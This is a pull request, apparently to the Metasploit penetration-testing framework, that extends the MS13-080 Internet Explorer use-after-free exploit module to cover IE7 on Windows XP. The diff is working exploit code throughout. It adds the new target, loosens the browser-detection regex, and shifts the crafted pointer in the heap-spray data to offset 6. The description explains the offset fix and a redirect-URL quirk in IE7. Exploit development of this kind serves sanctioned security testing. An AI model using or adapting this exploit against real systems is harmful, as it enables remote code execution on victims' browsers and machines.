### PR TITLE
Add support to ms13-080 for IE7 on XP

### DIFF
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -66,8 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           [ 'Automatic', {} ],
+          [ 'IE 7 on Windows XP SP3', {} ],
           [ 'IE 8 on Windows XP SP3', {} ],
-          [ 'IE 8 on Windows 7',      {} ]
+          [ 'IE 8 on Windows 7',      {} ],
         ],
       'Payload'        =>
         {
@@ -121,7 +122,7 @@ function dll() {
 }
 
 window.onload = function() {
-  window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
+  window.location = "#{get_uri.chomp("/")}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
 }
 </script>
 </html>
@@ -208,7 +209,7 @@ window.onload = function() {
     os         = target_info[:os]
     js_payload = ''
 
-    if os =~ /Windows (7|XP) MSIE 8\.0/
+    if os =~ /Windows (7|XP) MSIE [78]\.0/
       js_payload = Rex::Text.to_unescape(get_payload(target_info))
     else
       print_error("Target not supported by this attack.")
@@ -224,8 +225,11 @@ sprayHeap({shellcode:unescape("#{js_payload}")});
 var earth = document;
 var data = "";
 for (i=0; i<17; i++) {
-  if (i==7) { data += unescape("%u2020%u2030"); }
-  else      { data += "\\u4141\\u4141"; }
+  // IE 7
+  if (i==6)      { data += unescape("%u2020%u2030"); }
+  // IE 8/9
+  else if (i==7) { data += unescape("%u2020%u2030"); }
+  else           { data += unescape("%u4141%u4141"); }
 }
 data += "\\u4141";
 


### PR DESCRIPTION
The pointer offset was off by one for IE7. For some reason changing the whole buffer to `%u2020%u2030` caused it to longer trigger the crash, but the surgical change of offset 6 made it work.

The change in the redirect URL was because apparently ie7 is less forgiving and will attempt to use a url like `http://search/?o=...` if your url looks like `//search?o=...`, which is a bit insane, but it's IE, so there you go.
